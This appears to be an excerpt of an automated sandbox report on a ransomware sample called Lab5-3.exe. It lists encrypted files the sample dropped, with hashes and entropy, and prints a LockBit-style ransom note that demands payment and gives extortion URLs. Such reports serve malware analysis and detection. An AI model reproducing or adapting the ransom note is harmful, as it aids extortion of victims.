                                                                                                          SSDEEP:384:lUJc4r6HgaYUcaSx+rb+N7vY3SS3xSUbotDGCnxtb:lg1rmkNRy73SN1GyxZ
                                                                                                          MD5:5B16FAB9262051FC97797E5FAC7D1BF5
                                                                                                          SHA1:3F20ACF39AA50D1D369E756A60917E782DEDDB5B
                                                                                                          SHA-256:92E7FC79A5F10BC3D2704259EC9F7BA460A3B5D50875B2B456A56C355D074CF3
                                                                                                          SHA-512:6D8EB00612B0F3180B0F57B0D381313A55E002FC78D2EA4AC535F43D0AB685CF2CD5B8E7B5FF4E4DD2506D88048364558FCCBEB67BE2D74CB8306EA77ABF7BE2
                                                                                                          Malicious:false
                                                                                                          Preview:.JEno..Z.|[...........?.<.)zR..[&.hG...^c..........Z..O.hN.a=s.pp.....F..r.....%.h....%....v.y.s....o.2.p...s..i. ...#..Sq\...C.\ok....tL.3\..S..`..>..5....d ..#l.6P....T..&....#....A..-.d.....'.3....}.......K+9Dy(.......Up;.d..d..'...O..#!'..7h....(.S.a.X.m.<..l.....QG.$.%6.z.....e....?........p..~.'.TL2...;...c.....k.....=&..R'....\......O......GS.../f..[.z.=...8(qb.j....[.e}...v.Z.$....#...#...........;.^'[............R..c..Lc.<C....I.M....\...N..B4.......f.H.f:.....d\..-......e.1..."#........+..>......m.C.+^.H.O....<.v...O...........x..P..A.%.k.a..et...{...)P.F....2..6...0...^.r.&>].i.m.n.^..])..x..xzd+K.$...~.[ .s...,.....-..&.L.%E.9.A@rB.7G-U.mE'.y..._....k..g...$...92.......d.V.8R..>..IK......7g....*.KY5.'.6.W.>X._......*7)y....x.]%T.U...km.HqY6rR..Eh4...R....KCL....n.F....+.......].2...._.X......q...>....1.$C......+h.....v...'4.<..O.=..;.......(....xr.g...S..x.s3L.{u.H..d.....b..@.w..{i....+.%..........:*L)....2..#.ZO.[
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20416
                                                                                                          Entropy (8bit):7.99134134533215
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:xttzp7u0J6YtdYea6dP/7cnxy6ydrPP+3MPzQ0GMuO5zLZ3tb:/tV7hJjtdYanh6QPP+wzpuOFtZ
                                                                                                          MD5:F84DF1D94917AEF3D03DB508B2629823
                                                                                                          SHA1:109BE5EB617EC4B5398C1D5550B4CB42CCD444A5
                                                                                                          SHA-256:0E90FE6BF8E33288E5115BF74799466E163A6039DCDEABC3A9110B3495EB8CDF
                                                                                                          SHA-512:3117ACB6CFAD70740B4208EC52DCFD9763546F66A83E272536515A8EAEB7F193DC96A0F3A8FDFC4C83FC16198F0AEB0CC540043DFEB9ECFBCA74D24062057F2B
                                                                                                          Malicious:true
                                                                                                          Preview:#@...Q..gX3.QQGua^.>..]...9@......@E.'..Z..t...0k..oA.".Ph....z...&.ClV.K.W.*..=....J.A....1..,./...-...F..o...b.....[.:........58.T...Q8L;.z..n........XG.r....gh.c..n.R).e..k..L)..5.r........C.m]x~......b.&..*@.o.2.=..6..L.L`/........mN..D./..vZ..\....FV.j2....:I<..|..S0n..T.m5Y......yE.T..B.y..;R9Yh..................qz..R....7.....=.*P.3.v..!........[..d....8dA{...9..6S..I.....^.Fy...q-.....N#t..#./!......'(kR......m.2....m.W..>k.....8..m.!.j!........<a..&..<].u9u..)L.......1.v.)....!91$.RL;.>.. y......).f0/....H........i......~~|.iz.&t.....M...sT..E....,..q.......S.. Rz.V'8..`......G$.N..A`..j..B....Z@7..lg1b...9G...4B..MKS.[j.3.7g..4.&6..C*"|...9h.X....)~Q...j.|\....1M.[p.m......V.'.k.N.....)...e4.!.l...At-1!M.......+...C?.D......g......t.|(-J...I....g_.xO....d.A.............5..4f.s.|.....m.A..v.5.$f..r..s.Uju#..R9.F.......}....'.W...!.%..?&.I.[.q@.s.g$U...PS.A!P.8@p/>N)..f.`.....|,..n....u+"KP.:.`r...c..2.U9...eA...K...9<1
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18224
                                                                                                          Entropy (8bit):7.9903008062465695
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:HvXcvoS/PEjwfTX1eu+HkCaOMh02qQb9Rcpetb:UvoSwwfw202HeeZ
                                                                                                          MD5:EB00E27E7F392579347A699E20EB83C7
                                                                                                          SHA1:E6F7A511E14F03B369EADB6B5762F3FF9A0EE8B8
                                                                                                          SHA-256:06A080CCF1C993C2BF3B4195F75C11EED71F657CB044837359FEB065B3753BA6
                                                                                                          SHA-512:7EDC8548E737BB326339899A6C5A6EC47D92E0D035999062E769312F2CEC537E4199D6D3EB4C7782999E326276C2FB512D2DA6C268FA016EF5AD3F663655F1AE
                                                                                                          Malicious:true
                                                                                                          Preview:<.....*..s.. .v.8?!.M.........i...W..._..k...9~....F........m...>.[.ZqY.......z@hDP.....3..N..,0d..Lu......>.B.g...qk@....4.[.......?..'|.SKQfo0.h.QNX7.Y..0...e.^.*. ..$.4.S..Cz.'.......W..\.......md........+4}......4..B.'...n:~..j...TK8...X|..D......N.7.R..s.L{.....t...n..O..-...X..Y.....L.}'.......c..2........G."6V1u..G.Cb9h.4<.]...!..q...Vt6.Z-..%.8r.EE..o._...5{..?..i..$[.Fb..[..Z..Y..S+..v....#`J.R.Y......?.v#....x...P...4..*..A..?Ac.p..U..D...%.;...-...[..k.4..p ........(....S3..^.e..{...6u.y.7!....C.._l.F.%%..!.R..3...].V,..Yk......m.].67..|c..5k...k.T( piZJ....IFj..Bk..@.F.E.......r?.........s...4..4.'...z/..O....(... .%?...B.We...._..:.o....U(gwR....sjO;$G7b.tu.>....$.|..._..B-c...)...,/...&.f."lF..L...Ak.\{`.$....^\v.K.Vq&....A. ._.E..?.'F.V.....nz.r.R...rJ..C.2i...gb..N.5.*.........r}...(..G.2.(.M.,.oE-....@../]........L..H.....=.X...=s.jD.L#%.*..t.,;..YE.B~(>Z/.......v=....G.#.&..K........?S........Af9k.A..?...(.q..l4.}.7.&..48..".
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16448
                                                                                                          Entropy (8bit):7.988971074986458
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:iiD1R/uqSlZNM5xGlAM7CVcWAp4k40fsnpzP3RPwbMgPHMtb:TX/u/M5IAM7CVcj40CP3RoAsHMZ
                                                                                                          MD5:F15BDA3A2AB611DB4F64D6FD303A07FE
                                                                                                          SHA1:98E5366C0FFCD4FBD66BB20A4AD51C07CDAF6193
                                                                                                          SHA-256:9D0789A9CDD18265C6E9CCD4ED88D9FC16B2CCC23B3840C285E71086E7E43E92
                                                                                                          SHA-512:63EBD47B15720B6B1441974025930C99CB141F073C0E4B592A4C6910139167632838ADBC1F1FB09C374A3008BB21DC6F5C724440A18A21B75CDFF014DA607469
                                                                                                          Malicious:false
                                                                                                          Preview:.%q.D...Y..H.rf#k.....r.G.......2....].$..#R8D........6x[|..H...9....].-..@..v..\.F.sf..7~..oi.$.....$...7./z.....[Jt\.>.t......,.......No.....=...#........w..J.L....G`......Q...&.'...i<..K..FJ.<&^."~B|k......ZS.:..V.?,..b.)...1L&.SQ".,9.......B.N..)}]..P-..n.1..>..8.?%*O....x..5....(.p.......\..}|..k...^4....6._r.m.....e.!b..$S...~....d..<.{t.<....0d._....6m....@..._...=....PX4@..I....L........n^... op.9yc..t.....L...K...y..r=...Op,5FI...;..a.j.5.......W+l..`.:......0..?.G&.;6.`..sn.T+........_6..(......l...W..+.+...kJ5^..\.$.../..&gH...@@p.ST< ~JcK.X...b...|..2..fO..W.,`.......X.#2>%.S..g...akW.......rv.....8..|....d".>}2....F,.G.`..0....:N...t...LN..Ru?......~. ..HN..4.NQ...<.2K.}......`.....g.E.(DY.Y..Z...|Z..(.@.(......h...)P.....-.f5.-...<]j..._s.P...&....6..XB.t.4$.."lM..F............@>.e..d.n.(.~......M.>.Em.L..8....|!..&*..J.#5)SbX.....h....B..o........@..(..J?we`..'...Bx>....4.I....h..vq.i.]....1..5.o$qR.[.."..0....2B.k..d%G.j+U`.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17696
                                                                                                          Entropy (8bit):7.988861933120818
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:+p29dPcm7XYXz3wBrffYqc5okYT1xhIJSX8AWaQE0ietb:+pstcQXYXz3WrfQENxhoSX8haQE/eZ
                                                                                                          MD5:08ACF319A49FAC7654F0BB599B13E8B3
                                                                                                          SHA1:1D8ED76A5FC5E8515763226C586BE944ADAC5E8C
                                                                                                          SHA-256:4DFEE5289CBBBDC45255F39F89D887D1568542A15A02D0A9BB06F42CE29AA78F
                                                                                                          SHA-512:4562E313DC35AA72C30DE2DE80B5289B06472B8F52169AA9195A78E0056B4CF5C272F0BC915274313F7C9F6214BE3C75F8CABDD05E0A6CD5D5AA6EC5AD68D02F
                                                                                                          Malicious:false
                                                                                                          Preview:C4.|...,..S.y....6...d.Q.......w.AkAX^.....[.1..r....O..s,...;.<....e..u.....Zij.....\^.S...Z......T.........T...<P.p>1.f..[..$.a......k....GF..D.o.9...;..-.#x.5.1.{..7...Vs.....e%.D......E.Cl....e....e\{.%fz.3..BE].(j...@............_.v3sm_Sk......)...l;......Z{...hY...0.v?K+/.&:.us..GH.....O..."w..g....F..l...s.:>......H.*s..[....\0..T:6.P..jJ=.g.P1..I.6.`..x8q..S"?.6.U.&....Nv&..^LQ$.&..../..K....jM...C....@;H....rxh.w05~./..b.9.....O.s.b...^.4.oa^L..,.d.R MLMG..'...?.8/.k.......&.v'...E)..k}o.......O....O2.....V..x.:?'%..;^.eX..p..m[..@.sS..u.W....B..Ih........x.+.j...c.M....Yo6<q.[D.7...&........hB..j.c....).tm[>J.....x}.`..;....3`|..f=.9........l.4K.s2./k../4-...e..2}.-g:?........Z.......c..-..E..)........K.[................{M.Lt._o.5.....D-q...65..x..B.M{M......J.....o.:`t.T@.L..2..1.I.oS....J...$.'.e..aX...r....C......(t:....ph.U..H..L...*..!..}q.......+,.Gl..j...:u...q.1..}..^...H....xU.R....jZ...Rg.wM"...![V.P*t......v..>:
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17680
                                                                                                          Entropy (8bit):7.989693150141985
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:K84lIOdDYup8IxsTIWn2qeNFgcoYLxS45eclih2xbgtb:54f8IqIc+gclE45ecYQxbgZ
                                                                                                          MD5:9B475739CE96E0312E743E2F56ADB762
                                                                                                          SHA1:61E3827FC7DF24BB2D263125634EEF5F5A9C2C77
                                                                                                          SHA-256:B4C0C847AC022E53EE281194E6F9D184FF5DBFB8D369213B8C812D875A687650
                                                                                                          SHA-512:4A665069FF3E5E3F011EC8B32A666FC07EC822B89F6E23949C4C0B41F292D43E8B1603B20739628569A04B4F2ED596D65F64C1DBD286D7149C15977D1C356F84
                                                                                                          Malicious:false
                                                                                                          Preview:C...5..xM].W.:7q..3a.~....xj..vGw..........a].(10..'...c.W.0..I..sh.>Eu.......)..a2.=...0..8k...+.?{.....T.\...VE$q.......".......X.f.r.0d..........+k......7Y.%an^....y..y./.....Y.=X5.........-.H.Q.#<.. c...c-.7..ze.R_.T.{.d..}T.u.......%~.... ......_.7.~lH3..i....*..{....M.W.!...T.M..h.@{...lh.9........-2z.{....bB....j..J.h....,`N.S..Z.v..FA%..B.4Wi..}7......o.,.....I..m...)A...1.@..t....)*...;..\..<..5.I..|..SA..G__....8&.....!!.-.H....z....mi..55........)..-.1qo..l..<..C..<......a.-....l.QRd./...!A.....Q4>.b..*bq...9.5-..<oua.:.....@..@........#\.Km....&..F>.K...S....T..b.J..<..X..E1M/.....8."<.p";.G.?JZ..j.}.c.d...GP6<.k .j]s.M.3..=..]L8=@._.l.*..-.mRe.Y...u.Dw3j...~.\*/...0U.....-.....4&.+.......%.......<...^..h4?....gr......1.t.3=;...].j}|..`Q....r....*.+.t.t..h..O,.*.zD.i$..d.OR.....J@..s.`A........j..........]. G.z..F....I..u.........?...J.8......fu.k......Y.q...$..1..4...|....t.X.."...h..B.`=....={.h.....................
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17696
                                                                                                          Entropy (8bit):7.989560196944976
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:s9+mn2wMDjkVGYmfHlvbG5xJgb5iOHOjjtLxITg203am8FPtb:s1nIDjksY2H9aWM5Ir0qFZ
                                                                                                          MD5:247C60563FCBFB86828BE874C77DE563
                                                                                                          SHA1:9449CDA4A084B71BC58B5A284FEC47D1E6F1A956
                                                                                                          SHA-256:28420980A92E472D75A158D9409ABD1F595F6A038FED6E4E2089945EF419F247
                                                                                                          SHA-512:59317E843B9010B3CA6FA9D700BD109BDE78F3765C3E57F306BFB4BCEA2D62EA812C692185BA9801DDE2F230B33D57C56C778CE7228B946AFD81354E1AB6C563
                                                                                                          Malicious:false
                                                                                                          Preview:.... 0&.D..T...a..........L.W..*2T.K....(7.5B..9.>...b.}....h...5..)....8....S.0.-....g.=....u'.:.Q..P..&..+E.#..#....,x*...~f.^..:.....%.S...X.!..".L...Q.<.,b.:27.F.h.v..'.)kIuo~CEJ..G.....-.d...r...]....}`.I..'7...J.....q...^+.)..3E.t..i9.>M.N[1..#.......#...hk!`@.S.R..*.~|.;.7u....3.....t........d.b9..Q.p..+...D....x^....z.j.j....B#.U........{l.[..'...R..!....-~wD..,|.B.m...[....M....~I.&tl...6#...h..U1.....?.......U9..K..3.`.....Jb.4.....&w.E.v..u.).;."h.v...fC.a6[.i.J......<.#.59..t<q..?.rnZ6.... .i...9_].....=.h..".~....u....z.[..q5N..MX...[...:..l.F.G5.z.I.V.g]u..8...0 ..:.(W...b.xj#h..L...$.I...A... p.(....A.=.<..........H;...Q.......1*.e...l.,...$*/N.....c....).y..=.,....%;0L.Y....h..%.....#.[....C3..4L..%"..?...C...YEa.(A.nl..ph.'...A....x-9;.o.....*'c..W=..,...P...z..s..t1*.,E3..O.O...h,*.....e^0.x..&.e.m2(.V....Za........z.m.....9;.'..J.E..i].K.=.C.7.q9.h.yv<u6.*. |...Q.(...........8.i.....|.rV'.....#.#F.^.FV.* ...g.v<
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18048
                                                                                                          Entropy (8bit):7.9906316711494965
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:lQYKEiD+pg/4Hp9j8OxuHP9udZjSQfUEtOKtb:fZiD+qwHplOMdZVUGZ
                                                                                                          MD5:C53AB0C09292D051A98B31D0ABDE9AA7
                                                                                                          SHA1:F160798C97E45189B913872884AEEDDDF2CCC746
                                                                                                          SHA-256:01E311B7CF3065FA85323C665EB11F063E49F89730884E376852589CA83DF7E9
                                                                                                          SHA-512:D955F0369E6F287B35D2618C4CBECD8C9CA8830F46DF6C9DB236A362FEF3C49C3B4F969876B5FE7D68AFB37BBE3B780F7F7CBA05D7A8E5D7539E802058FBB14D
                                                                                                          Malicious:true
                                                                                                          Preview:..vUBd.d....yu._n..ac..e....{0..3(..%CR.(6.."(Y.a.........o@.....C.E...!c.*?/{.2y....@1..'k ....l..BMAN....i!!I_..j..v..8.......].r.rx_.y...].;.....[.....x8..Jr.D..Y..g..1.Tu.T..}eQ..X.'.J.Z.sB..uq.mD.....T..+.z$@.i...>o.h.Y....u9A.gu!.S.n.j..........n...D....D..7..2<...x.V.P.zb..+.^.&.o.=....`b...7...U./...mQ.l.qLP...,!X.L`....?.<..Z....D.w.71......>..;<.....[.4...M.....}...lX6...T....V.,5%.}.X...{v...y.{..9...B..;...@.!.-........}F.W..'.{5...N..v.s.$..3....$.]!.r..m..(.#.0V*b.....^.m.^..D.O.....I."..rW..U.....F|..].>t...'.V...'..fG..G..s.........eM..E0\<G....UG...*.8.1Ud.....+..:...p...JP.p..Y.Vc..G.!..+....@=.K....c...>....Al....=.....y.s..|...i..<.".)B...........dGEs.e...3.l...{j.A.L.@.Au..Yjff.b..4.|.+(S..a.ZpML.e.'f..@[.cP$.9&d.......^...::.L..[O...v..W.J....o+.W7q....K.y.Z..yjz......Q.w.0`.lp|..............f...&..R.[.4T...*..U.W....n<.|.......+.P?SX..Q..c...%..Im.@...D..j...G.._M....$..9..^...."..>....t..`}.8.....7..R..b.Z..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16000
                                                                                                          Entropy (8bit):7.988093586279695
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:rFQZ4Oxucqtpb1jfhvhLGgHYx4g0Rgsx+fXDeZ44ltC+tb:rWiHcqtVJLva4pgMAeZ443C+Z
                                                                                                          MD5:8901C0799FA4F03007D623DA6AE57FD7
                                                                                                          SHA1:C89900B743F33F08A2E79BAFB1E0383E158DE1E3
                                                                                                          SHA-256:5C1820F75B2EF74097E443AD6189287FF49921949C5C2786463D40BE9A33C645
                                                                                                          SHA-512:240B6DBB3E49B2139AF454CB646E6254C68A30E251EC0570143FFF5EDF1B4EF14978967997CB39EAAB179B5D23467018F11D0802517FA05C0039E9F7A9704284
                                                                                                          Malicious:false
                                                                                                          Preview:.....].t$..Z..n......E...^..#A.`z.....=.z..!mf..<YlA#...E.v.#.8..b5Yv.M1..(..g`....c.s..J6k...(.Z6#.....g.B...,./t.......g.\......IK.F|.t...V..\......-5...,Bq..nU..U..Q....l].../.+@-uSH..|.Y>......~...\..)..vJ.q....Hz......4i...q$.w.....9.J..9...FL.......I...e;..S...M.Eyg.Z;6..s1.(R...D..e^........sj.!x...<C.]!.}Nk..Qd....!.{..@]l.r..d+.H...f.j..H.Vq.\u@c...Jm.gF8/.LPAN9lSY.....PF|...Re.Eu.K....R.lA...>...c.....uT.#..,.t...BX.$.....q......-.Iz.+.F.i...S.d...R.......q..b.l...O.{.F+{w....c..Ro...9............]2[./...+..!.^..PT...&...lV...To.m/<"H.4.'.-=H...c.......9.......C&...YI...*.N>V.Fpt.@......;.deQ..a`.}.B7(5I....~). .\...v=.BMa...S...k.Ot...=u......X...k..q.@.0..k'..wi[=.i..../ .hQhna!M...{.....V..?z...+]&.........+..?0.5T..&X.....lE.:...Ua&....E..!.M..].~..^....5;#.G.So{.....8..b.~;E...y.z.Y.{...Q.-....@%..-...5gx.O......l2..E.,$bOw..... .\.s.U...C.M..g....E../......:...EY.#.........ejt?...Y.....2.E....d...=.)F...n...n@..@..1.J.n.l.v..U..}Z.q.$
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):24576
                                                                                                          Entropy (8bit):7.992699075401777
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:9RkXN+e0DY8d+GZ10YB2G/BjY2mvbidbResEZALKagbYneotb:9dZ+hYB2OlYebcsbL9uKZ
                                                                                                          MD5:169E2F613F4E29FEEE17AE2B096597B4
                                                                                                          SHA1:C02816794683A880FFE5FB37829FF94D271CB646
                                                                                                          SHA-256:B3960CB46DB7BEAEDBB6F04D981DA87C37EAF4F64CD584F18FCC0A8CA9E63578
                                                                                                          SHA-512:D3D5EF4A0FD513C764FC5DE8D674F572163049FB14B52C4DE7A1792C6AF7E2001996C7115CDD8CEE094EC0139BCE9E15C00FB8CCF08C33762ADA3B8058A873FE
                                                                                                          Malicious:true
                                                                                                          Preview:`.*?......@...;.8.j.#..cS..)a\.aj..>&.,y.H.4...#$dX..L+r......1...@.af.Q...f.%m./i...:....4."..h.....B..f1..y..+..`m..Cu^n..U....(.......,..K.....K~.....N.0..!...%B..s.....;..[.w.2.".V..X...C...........e.1...;.|=P...W....K..lA).W.n.a5.z.....;../{.........G..;z.w....".aK.$.w{..`[...S...D'..(W..1...l*.-..(h.....]|..6...7..u.r.A`....U.~......'?.]Qx..P.]hj...x..>)..!<.e...=.n#..N.@R-,.vc.W.3.].)~.MU5;..b...=.X{....@.y...D.....c...1N....|.....[\.t/.#..+..l.:H.-#RD.c....(k....^.=.....iQ.yS.....e...x.%..1..U..}L.=].S.!u../A/...z.1$Q>..-Q..pT.+.E6d.2...(.=..?..&]..C.)p"..T.u)tU.......r.)L..K....,....O<.....V6...<.G...z.o..E..h...8.%DE.S .d....N.8.P...].0..A..1...C:o.^.A....;.-..;..oW...P...cb8..*..=.-..a.../8....K.a.-.....eR./n2. ..".5nb|X..+"jM....\&oFv..F...\..*D.8..NZ.L...O..!c......W..Twa...l.....E"p..d.iE*.....}.b.#.D.e.n.n..W.e....1,..Y.*......R^..q..T....e..we..qy.......M@...F....B2C.5_".....M....,u6...:..L.....uz4.. ......[...[_..@
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18240
                                                                                                          Entropy (8bit):7.990063171885365
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:cywYq3kd9TiueJTK4s60aX3aNigtoV4OUP5sH5q71jgtb:c1x0d97vL1/NRqV455y5qSZ
                                                                                                          MD5:FE36251D5B9C1C2714BD491E5B1442E1
                                                                                                          SHA1:3C63A592DBA109CDC065FA2BB73D945609AB2C90
                                                                                                          SHA-256:11ED742506EB2D14DF43B43E78F84EF4863092C981D9572FF77E653FB18A3DD9
                                                                                                          SHA-512:F2BE8597BC18D53ECA9A3B37C0218E2BB60A17594EB732977138B1DA7F2B8949B9FF2798FA2D21895CB0958821E7DE3831C171859B413B9F2FA488B9A1C682B4
                                                                                                          Malicious:true
                                                                                                          Preview:.J.-..P...).X:...($..W..5........S.......1r..p.%.Xi.U...:.i....A.?..tY.o.b....lT.WG....-.X....F.tc|.[.1.Q.&{.#.TW..v....[*#aw..Q.`.......Q....e$aJY;..,.+qh..:....u....4...v....1.W7i..Ss.(....P ...V.......%.8..9....d..s...vz..."(X...].....j+Cu.Y..;.8..y.7.+..naH.a..[..RVGD#...O|.!.O...c..e..V....A...r..._.~.m.L.).@Cops......3vT_.{...-..>.9.... J...Y.y&...&.I.w1.s4>g.......O`.h.%.%.=y...........c=....Txf.....'Y8.(!..B.W....Wr....).ee...X...@...0.....S=.Tg.@.-...<..y......exg.L*J..E\.d.#."..nD..J<.Z.........~..Y....]...D.F?f.I]m.*...M...i.....w...k..$H.s....... F..E..$q.(.-.n. .8.$.......2.....H.uBT.9.*g......dAWnS.2...Z..............`.+.......7......`...{....3....y.)..x.Z.x/+3..<.[..._...>.a..J.EW..=.$3.....#.r.N..m..K:..K..Z%w.S..%...r.=...,......D....G@...Ldw{.j.'.E9o.....s.w...%n..d....C.....H..3%y..c....Q...y.*.........K...c7by8.z.8....mm........<x.9~.....G.hr[.'Oh,.(.d.Rj.!.P......VD...m..w?.uw.......a.*...[..p=D..Y.'K..eC.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17104
                                                                                                          Entropy (8bit):7.988338132213777
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:Xr9lx554BFiVnd1V0pWrIW+ShnxM0BVnwtb:b3x5mBFYdr0ydhS0gZ
                                                                                                          MD5:7C1CC8A9366CCDC4861BC11EA7FBB90B
                                                                                                          SHA1:0AA55369C81C79D228BD5F999011B676CDED0C0E
                                                                                                          SHA-256:C3A0CD2A7B94D5D2A1214F2ED450476BAB6DDB0F9B8139547D259286B069B5E1
                                                                                                          SHA-512:F77BD511C661F539AEAB509E18A68FED30323DD02D3206FB24396070F2942A800BC480B88B68E9DE7147CEEE3E0F44FF93300E948A0BAE11DCA8ABADF8DCCEA8
                                                                                                          Malicious:false
                                                                                                          Preview:..Bs.._..s+c.B..P........t_pe....In....,...v.6.[t..../....x}..y.I7x...n5..a..G.-...k.u.A.......a:.-n`a....2..f....5Z...X..Ro7.U...R..)..n.>..........U.....}I........%..w3.d...........F.z.3....1....2....g..9..a..p.n.P.+R>>n.....1c.l.\....h..DW.6..~.r..f.-z|..5.(.I:.7........FF..E.:.O.Yt.+i..h.M..L......-..&......w)C......c9y..E.*~.r.5...k.1.w..7..W....,.n.X~.oj..|.....Y..X..7..H.ual. .....3.z...,..L..)T.Zm.7.......(...Al..F.fv.M?...e........D..8...['j.J).b..W..O..,r.o....:>._..9E..c.......1K...1.s..D.*..0..r.x.d.t....,..']Ro.o.....6...*\;.,.&..:...w....:G.6S.:......d?V... <.}.W.f.U1fq*H.v.j...B..rA..0U&..u.sf<...C.....'G4rd..%.d18$.}.H......oEl..M....{\.6..BZs..p...;.\Jq.*...........J...ROb.y.{F.X...-b............ .........<.u..qiAp./......b..%......jy.?g..M....|....E..@.0...z.n....a. .cdOU..Ua.....`}.d.?....T.:...:.!..T...0........HZH_.$P...7.._.a....d..m.R.../..8e..X.!>,z..X."......P......wu.b....]..UY.=K.\v4 m6...0wnEb.4.h....B..r7...\B[.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16784
                                                                                                          Entropy (8bit):7.9893529708356645
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:VjfKkMa1+iQxVxNVSfNCMspPq5p+jXPitPemRwk4ntb:rMOAjxNVFi5p+yPemKkMZ
                                                                                                          MD5:FF55408A839A9A6A06711B0541ED6B42
                                                                                                          SHA1:4C532FB871664F5FCEC675AF43D39EBBAD6AAB2E
                                                                                                          SHA-256:AF2AC82472701B309A22C88A58C29850BF06FADB5796A922C134A77595755FB1
                                                                                                          SHA-512:FAA996BCAA53B1F034A297AF5717E518FF12541234D5761344A98A036A5545AF96464D7DE979E98C18ED9BF4CFC4F38CE9CFFBE1192860D6D8C63E114B572D40
                                                                                                          Malicious:false
                                                                                                          Preview:..nU.C......D....'?..+{....gKjy...H.n..\&..O..f50.Cj....A.k....<9iwI.[,S..T.....&.JR..?..%.K4e{....'.;..|x.I.V..../.....h..ro.z>...>..m....:....m......].....*...Z..1.*R;.}W^..t..Mg.B8.._+...|.....4-......v....R.(.Ev.)..;.f.R=h.?....N...GT..K.7.y.L.nk.^.,.n..h7.!7..;..".,.i.mW..0.v...N...7.....>w(Q....|..<....5.)...."..z.=.....FK*5...%..z*.s,..:i.jX...."=p,h...+....e.5..6.;K......PO..q......HJ.7..j}CTm............x..Wo....._@.'. .+.91..!.\...!.(F......K....J.pwKd\A..gB...J..((.@.Q.}.\.L..w..B.../.M.l.C...x.!@t.?Aa..R...Z.4s...s.Z...n...P..w?.o,...5.I.]#b....i...`....E|m...........:\g.5...}....v..u....5.P...f....."....TI..h[C\.xm.@...IS..]..w.....l.".T..>6.....Cy...d..in<h<...`....ykR<..W.+....a...}..b...`...wS...Z..^.&(.ns.@....}...K4. ......{fP......I..:...t..]!......^'.)@H...7.@P9..g..l..^.lt.V..}79.U.Z@...|%.nU"....N..F.Y..sf..v..'.W..5b...{b....t..-..0(..I.~.+...O..AO7..-o.!............2.Q.-...u.M.......E7n...rk.S.1...b
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:true
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17824
                                                                                                          Entropy (8bit):7.9898921993258245
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:1cazCMzr2vrDRefjt7kCAZ3Vn6DLRj/2dHCSjbrcLoKXtb:eiCMzSMjtYCOc+iSjb9KXZ
                                                                                                          MD5:26F0F051641EB26B121B6A011EE6CEB6
                                                                                                          SHA1:2D977ED4857FE8066CC7F130A60D17D210106FF6
